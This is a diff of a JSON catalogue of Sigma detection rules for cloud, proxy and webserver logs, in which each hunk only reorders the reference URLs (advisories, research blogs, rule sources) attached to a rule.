"refs": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ @@ -71849,9 +71849,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ @@ -71989,8 +71989,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ @@ -72843,8 +72843,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" ], "tags": [ @@ -73064,11 +73064,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ @@ -74003,11 +74003,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ @@ -74065,11 +74065,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" ], "tags": [ @@ -74211,11 +74211,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" ], "tags": [ @@ -74271,8 +74271,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" ], "tags": [ @@ -74340,9 +74340,9 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" ], @@ -74426,11 +74426,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ @@ -74991,11 +74991,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" ], "tags": [ @@ -75020,11 +75020,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ @@ -75157,8 +75157,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ @@ -75270,9 +75270,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_poc_exploitation.yml" ], "tags": [ @@ -75482,9 +75482,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" ], "tags": [ @@ -75569,10 +75569,10 @@ "logsource.product": "No established product", "refs": [ "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://perishablepress.com/blacklist/ua-2013.txt", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" ], "tags": [ @@ -75648,8 +75648,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://rclone.org/", "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://rclone.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" ], "tags": [ @@ -75682,8 +75682,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_exploitation.yml" ], "tags": [ @@ -75915,8 +75915,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.advanced-port-scanner.com/", "https://www.advanced-ip-scanner.com/", + "https://www.advanced-port-scanner.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" ], "tags": [ @@ -75949,10 +75949,10 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", - "https://www.spamhaus.org/statistics/tlds/", - "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://www.spamhaus.org/statistics/tlds/", + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ @@ -76463,8 +76463,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://bad-jubies.github.io/RCE-NOW-WHAT/", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://bad-jubies.github.io/RCE-NOW-WHAT/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" ], "tags": [ @@ -76488,9 +76488,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://twitter.com/jas502n/status/1321416053050667009?s=20", "https://twitter.com/sudo_sudoka/status/1323951871078223874", "https://isc.sans.edu/diary/26734", - "https://twitter.com/jas502n/status/1321416053050667009?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" ], "tags": [ @@ -76524,10 +76524,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", + "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" ], "tags": [ @@ -76627,8 +76627,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.anquanke.com/post/id/226029", "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.anquanke.com/post/id/226029", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" ], "tags": [ @@ -76652,8 +76652,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/LandGrey/CVE-2018-2894", "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" ], "tags": [ @@ -76689,9 +76689,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://dmaasland.github.io/posts/citrix.html", "https://support.citrix.com/article/CTX276688", "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" ], "tags": [ @@ -76724,8 +76724,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", "https://github.com/search?q=CVE-2021-43798", + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" ], "tags": [ @@ -76758,8 +76758,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://githubmemory.com/repo/FunctFan/JNDIExploit", "https://github.com/pimps/JNDI-Exploit-Kit", + "https://githubmemory.com/repo/FunctFan/JNDIExploit", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" ], "tags": "No established tags" @@ -76780,11 +76780,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://twitter.com/sec715/status/1373472323538362371", "https://twitter.com/Al1ex4/status/1382981479727128580", + "https://github.com/murataydemir/CVE-2021-27905", "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", - "https://twitter.com/sec715/status/1373472323538362371", - "https://github.com/murataydemir/CVE-2021-27905", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" ], "tags": [ @@ -76818,9 +76818,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.yang99.top/index.php/archives/82/", "https://github.com/vnhacker1337/CVE-2022-27925-PoC", "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", - "https://www.yang99.top/index.php/archives/82/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" ], "tags": [ @@ -76854,10 +76854,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" ], "tags": [ @@ -76895,8 +76895,8 @@ "refs": [ "https://github.com/payloadbox/sql-injection-payload-list", "https://brightsec.com/blog/sql-injection-payloads/", - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" ], "tags": "No established tags" @@ -76917,9 +76917,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_poc_exploitation.yml" ], "tags": [ @@ -76987,8 +76987,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_exploitation.yml" ], "tags": [ @@ -77021,8 +77021,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" ], "tags": [ @@ -77055,8 +77055,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" ], "tags": [ @@ -77148,10 +77148,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/yorickkoster/status/1279709009151434754", - "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", "https://support.f5.com/csp/article/K52145254", "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://twitter.com/yorickkoster/status/1279709009151434754", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" ], "tags": [ @@ -77184,9 +77184,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://f5.pm/go-59627.html", "https://swarm.ptsecurity.com/unauth-rce-vmware", - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" ], "tags": [ @@ -77252,9 +77252,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/rapid7/metasploit-framework/pull/17407", "https://github.com/0xf4n9x/CVE-2022-46169", "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf", - "https://github.com/rapid7/metasploit-framework/pull/17407", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml" ], "tags": [ @@ -77289,11 +77289,11 @@ "logsource.product": "No established product", "refs": [ "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://news.ycombinator.com/item?id=29504755", "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://github.com/YfryTchsGD/Log4jAttackSurface", "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/YfryTchsGD/Log4jAttackSurface", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" ], "tags": [ @@ -77384,9 +77384,9 @@ "logsource.product": "No established product", "refs": [ "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" ], "tags": [ @@ -77445,8 +77445,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" ], "tags": "No established tags" @@ -77467,8 +77467,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/pyn3rd/status/1351696768065409026", "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://twitter.com/pyn3rd/status/1351696768065409026", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" ], "tags": [ @@ -77607,8 +77607,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" ], "tags": [ @@ -77741,8 +77741,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://youtu.be/5mqid-7zp8k?t=2231", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" ], @@ -77776,8 +77776,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://youtu.be/5mqid-7zp8k?t=2231", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" ], @@ -77827,11 +77827,11 @@ "logsource.product": "No established product", "refs": [ "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://news.ycombinator.com/item?id=29504755", "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://github.com/YfryTchsGD/Log4jAttackSurface", "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/YfryTchsGD/Log4jAttackSurface", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" ], "tags": [ @@ -77930,9 +77930,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", - "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" ], "tags": [ @@ -78035,8 +78035,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://kb.vmware.com/s/article/85717", "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://kb.vmware.com/s/article/85717", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" ], "tags": [ @@ -78069,12 +78069,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/bl4sty/status/1445462677824761878", - "https://twitter.com/ptswarm/status/1445376079548624899", - "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", - "https://twitter.com/h4x0r_dz/status/1445401960371429381", "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/ptswarm/status/1445376079548624899", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" ], "tags": [ @@ -78107,9 +78107,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", "https://www.exploit-db.com/exploits/39161", - "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" ], 